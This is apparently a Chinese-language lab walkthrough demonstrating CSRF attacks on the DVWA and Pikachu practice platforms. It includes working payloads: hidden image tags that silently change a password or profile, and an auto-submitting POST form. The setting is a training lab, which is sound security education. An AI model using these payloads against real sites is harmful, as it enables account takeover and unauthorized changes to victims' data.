- 基于DVWA的low级别实现CSRF攻击
首先我们运行靶场来准备实验,难度级别调制low
默认账号密码admin、password
来到CSRF输入新密码
我们burp抓包可以看到GET /vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change密码直接在GET请求里
![图片]()
把URL中的密码改成123放包,可以看到成功了
![图片]()
接下来验证一下,退出登录-->账号密码输入admin,123
![图片]()
可以看到登录成功
咱们在DVWA下csrf目录下中写一个a.html,内容是
点击查看代码
<img src="http://192.168.222.128:8088/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Chang" border=”0” style=”display:none;”/>
<h1>密码修改成功!<h1>
我们来访问一下
接下来验证一下,退出登录-->账号密码输入admin,password
成功利用
2. Pikachu漏洞练习平台
(1).CSRF(get)
来到CSRF,点一下提示
可以看到vince/allen/kobe/grady/kevin/lucy/lili这么多账号,密码全部是123456
我们随便登录一个allen
看到可以修改个人信息点一下,burp抓包
修改参数放包
可以看到成功了
咱们在CSRF目录下写一个a.html,内容是
点击查看代码
<img src="http://192.168.222.128/vul/csrf/csrfget/csrf_get_edit.php?sex=hach&phonenum=hach!&add=hach!&email=hach!&submit=submit" border=”0” style=”display:none;”/>
<h1>参数修改成功!<h1>
访问这个页面
咱们在回到原来的登录页面
可以看到成功利用
(2).CSRF(post)
登录luck,密码123456
点一下修改个人信息,burp抓包
不能像上面一样用GET修改,咱们在CSRF目录下写一个a.html,内容是
点击查看代码
<html>
<head>
<script>
window.onload = function() {document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.222.128/vul/csrf/csrfpost/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="God" /><input id="phonenum" type="text" name="phonenum" value="BJernsen" /><input id="add" type="text" name="add" value="I'm hacker" /><input id="email" type="text" name="email" value="BJernsen@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
然后访问a.html
可以看到修改成功